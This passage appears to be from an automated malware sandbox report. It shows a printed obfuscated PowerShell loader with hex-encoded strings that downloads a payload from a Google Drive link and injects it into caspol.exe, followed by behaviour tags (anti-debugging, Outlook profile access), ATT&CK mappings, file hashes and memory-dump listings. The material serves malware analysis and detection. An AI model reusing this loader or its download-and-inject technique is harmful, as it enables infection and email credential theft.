'6F093E27272E6B766B100A3B3B0F24262A2225167171083E39392E253F0F24262A2225650F2E2D22252E0F32252A2622280A38382E262927326363052E3C660429212E283F6B1832383F2E2665192E2D272E283F222425650A38382E26292732052A262E636F18323B2322736262676B101832383F2E2665192E2D272E283F222425650E26223F650A38382E26292732093E22272F2E390A28282E3838167171193E2562650F2E2D22252E0F32252A26222806242F3E272E636F18323B232272676B6F2D2A27382E62650F2E2D22252E1F323B2E636F0922273D7B676B6F0922273D7A676B101832383F2E2665063E273F22282A383F0F2E272E2C2A3F2E1662';.($Bilv7) $Grnlandsk1502;$Grnlandsk1503 = Gerase11 '6F093E27272E650F2E2D22252E082425383F393E283F2439636F18323B23227D676B101832383F2E2665192E2D272E283F22242565082A272722252C0824253D2E253F22242538167171183F2A252F2A392F676B6F183E3B2E39252A3F226265182E3F02263B272E262E253F2A3F2224250D272A2C38636F18323B23227C62';.($Bilv7) $Grnlandsk1503;$Grnlandsk1504 = Gerase11 '6F093E27272E650F2E2D22252E062E3F23242F636F0922273D79676B6F0922273D78676B6F183C22392E383B223922676B6F183E3B2E39252A3F226265182E3F02263B272E262E253F2A3F2224250D272A2C38636F18323B23227C62';.($Bilv7) $Grnlandsk1504;$Grnlandsk1505 = Gerase11 '392E3F3E39256B6F093E27272E6508392E2A3F2E1F323B2E6362';.($Bilv7) $Grnlandsk1505 ;}$Autoh = Gerase11 '202E39252E277879';$Gerase03 = Gerase11 '0C2E3F0824253824272E1C22252F243C';$Gerase00=Gerase11 '1823243C1C22252F243C';$Gerase01 = Gerase11 '6F18272E253F392E3F7C786B766B101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865062A3938232A271671710C2E3F0F2E272E2C2A3F2E0D24390D3E25283F2224251B2422253F2E3963632D203B6B6F192E3F392E2A3F226B6F0C2E392A382E7B7B62676B630C0F1F6B0B631002253F1B3F3916676B101E02253F787916626B631002253F1B3F3916626262';.($Bilv7) $Gerase01;$Gerase02 = Gerase11 '6F08232A266B766B101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865062A3938232A271671710C2E3F0F2E272E2C2A3F2E0D24390D3E25283F2224251B2422253F2E3963632D203B6B6F0A3E3F24236B6F0C2E392A382E7B7862676B630C0F1F6B0B631002253F1B3F3916626B631002253F1B3F3916626262';.($Bilv7) $Gerase02;$Grnlandsk1507 = Gerase11 '6F183F222D2D2E6B766B6F08232A266502253D24202E637B62';.($Bilv7) $Grnlandsk1507;$Grnlandsk1507 = Gerase11 '6F18272E253F392E3F7C786502253D24202E636F183F222D2D2E676B7B62';.($Bilv7) $Grnlandsk1507;$Grnlandsk1506 = Gerase11 '6F0824262A252F2A253F2E6B766B101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865062A3938232A271671710C2E3F0F2E272E2C2A3F2E0D24390D3E25283F2224251B2422253F2E3963632D203B6B6F0A3E3F24236B6F0922273D7F62676B630C0F1F6B0B631002253F1B3F3916676B101E02253F787916676B101E02253F787916676B101E02253F787916626B631002253F1B3F3916626262';.($Bilv7) $Grnlandsk1506;$Orato = fkp $Bilv5 $Bilv6;$Grnlandsk1507 = Gerase11 '6F082426263E2522312A786B766B6F0824262A252F2A253F2E6502253D24202E631002253F1B3F39167171112E3924676B7D7E7D676B7B33787B7B7B676B7B337F7B62';.($Bilv7) $Grnlandsk1507;$Grnlandsk1508 = Gerase11 '6F0225283E39386B766B6F0824262A252F2A253F2E6502253D24202E631002253F1B3F39167171112E3924676B7A7F7E737A7C7D7B676B7B33787B7B7B676B7B337F62';.($Bilv7) $Grnlandsk1508;$Gerase01 = 'https://drive.google.com/uc?export=download&id=1nSKAGzrSWPtToUe3WbRHdqpyZLyve4Tg';$Gerase00 = Gerase11 '6F03243D2E2F2A203F396B766B63052E3C660429212E283F6B052E3F651C2E290827222E253F62650F243C2527242A2F183F3922252C636F0C2E392A382E7B7A62';$Grnlandsk1508 = Gerase11 '6F082426263E2522312A79766F2E253D712A3B3B2F2A3F2A';.($Bilv7) $Grnlandsk1508;$Communiza2=$Communiza2+'\Fogeych.dat';$Hovedaktr='';if (-not(Test-Path $Communiza2)) {while ($Hovedaktr -eq '') {.($Bilv7) $Gerase00;Start-Sleep 5;}Set-Content $Communiza2 $Hovedaktr;}$Hovedaktr = Get-Content $Communiza2;$Grnlandsk1509 = Gerase11 '6F0C3925272A252F38207A7E7B6B766B101832383F2E26650824253D2E393F1671710D392426092A382E7D7F183F3922252C636F03243D2E2F2A203F3962';.($Bilv7) $Grnlandsk1509;$Hovedaktr0 = Gerase11 '101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865062A3938232A2716717108243B32636F0C3925272A252F38207A7E7B676B7B676B6B6F082426263E2522312A78676B7D7E7D62';.($Bilv7) $Hovedaktr0;$Gautes=$Grnlandsk150.count-656;$Hovedaktr1 = Gerase11 '101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865062A3938232A2716717108243B32636F0C3925272A252F38207A7E7B676B7D7E7D676B6F0225283E3938676B6F0C2A3E3F2E3862';.($Bilv7) $Hovedaktr1;$Hovedaktr2 = Gerase11 '6F092E38392C6B766B101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865062A3938232A271671710C2E3F0F2E272E2C2A3F2E0D24390D3E25283F2224251B2422253F2E3963632D203B6B6F192E3F392E2A3F226B6F1B2E382A2823293962676B630C0F1F6B0B631002253F1B3F3916676B1002253F1B3F3916676B1002253F1B3F3916676B1002253F1B3F3916676B1002253F1B3F3916626B631002253F1B3F3916626262';.($Bilv7) $Hovedaktr2;$Hovedaktr3 = Gerase11 '6F092E38392C6502253D24202E636F082426263E2522312A78676F0225283E3938676F04392A3F24677B677B62';.($Bilv7) $Hovedaktr3#"
    3⤵
    - Blocklisted process makes network request
    - Checks QEMU agent file
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1752
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
      4⤵
      PID:1696
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
      4⤵
      Checks QEMU agent file
      Accesses Microsoft Outlook profiles
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of AdjustPrivilegeToken
      outlook_office_path
      outlook_win_path
      PID:1944

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Web Service

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
61KB

MD5
fc4666cbca561e864e7fdf883a9e6661

SHA1
2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5

SHA256
10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b

SHA512
c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
1b21d0afdeab045ea92e537b35c3fa69

SHA1
120273cd41811435511cf864cedf2d3012876840

SHA256
98b3354a4d6073afbc83a45377388c20af3a84cae62497e533375de741bb551b

SHA512
8c2b7368fcae053e5d03cf87ef97eb33d78e365fe6e8a02a3bae8b66838c8a991e077a8112a668b476014f2762cf54558e6076d62b56e13e0f7348643dc8f40e

Download Submit
memory/872-56-0x000007FEFB591000-0x000007FEFB593000-memory.dmp

Filesize
8KB

Download
memory/1168-61-0x000000001B730000-0x000000001BA2F000-memory.dmp

Filesize
3.0MB

Download
memory/1168-59-0x000007FEF31A0000-0x000007FEF3BC3000-memory.dmp

Filesize
10.1MB

Download
memory/1168-60-0x000007FEF2640000-0x000007FEF319D000-memory.dmp

Filesize
11.4MB

Download
memory/1168-62-0x00000000026D4000-0x00000000026D7000-memory.dmp

Filesize
12KB

Download
memory/1168-63-0x00000000026DB000-0x00000000026FA000-memory.dmp

Filesize
124KB

Download
memory/1168-95-0x00000000026DB000-0x00000000026FA000-memory.dmp

Filesize
124KB

Download
memory/1168-57-0x0000000000000000-mapping.dmp

Download
memory/1168-67-0x00000000026D4000-0x00000000026D7000-memory.dmp

Filesize
12KB

Download
memory/1168-68-0x00000000026DB000-0x00000000026FA000-memory.dmp

Filesize
124KB

Download
memory/1252-55-0x0000000000000000-mapping.dmp

Download
memory/1328-54-0x0000000000000000-mapping.dmp

Download
memory/1752-71-0x0000000076D10000-0x0000000076EB9000-memory.dmp

Filesize
1.7MB

Download
memory/1752-66-0x0000000072D50000-0x00000000732FB000-memory.dmp

Filesize
5.7MB

Download
memory/1752-69-0x0000000005AA0000-0x0000000006888000-memory.dmp

Filesize
13.9MB

Download
memory/1752-64-0x0000000000000000-mapping.dmp

Download
memory/1752-76-0x0000000076EF0000-0x0000000077070000-memory.dmp

Filesize
1.5MB

Download
memory/1752-77-0x0000000076EF0000-0x0000000077070000-memory.dmp

Filesize
1.5MB

Download
memory/1752-78-0x0000000076EF0000-0x0000000077070000-memory.dmp

Filesize
1.5MB

Download
memory/1752-93-0x0000000076EF0000-0x0000000077070000-memory.dmp

Filesize
1.5MB

Download
memory/1752-80-0x0000000005AA0000-0x0000000006888000-memory.dmp

Filesize
13.9MB

Download
memory/1752-92-0x0000000005AA0000-0x0000000006888000-memory.dmp

Filesize
13.9MB

Download
memory/1752-65-0x0000000074AD1000-0x0000000074AD3000-memory.dmp

Filesize
8KB

Download
memory/1752-70-0x0000000072D50000-0x00000000732FB000-memory.dmp

Filesize
5.7MB

Download
memory/1944-85-0x0000000076EF0000-0x0000000077070000-memory.dmp

Filesize
1.5MB

Download
memory/1944-88-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1944-89-0x0000000000401000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1944-91-0x0000000000400000-0x0000000000430000-memory.dmp

Filesize
192KB

Download
memory/1944-81-0x0000000076D10000-0x0000000076EB9000-memory.dmp

Filesize
1.7MB

Download
memory/1944-79-0x0000000000620000-0x0000000001408000-memory.dmp

Filesize
13.9MB

Download
memory/1944-94-0x0000000000620000-0x0000000001408000-memory.dmp

Filesize
13.9MB

Download
memory/1944-75-0x00000000003F768E-mapping.dmp

Download
memory/1944-96-0x0000000076EF0000-0x0000000077070000-memory.dmp

Filesize
1.5MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads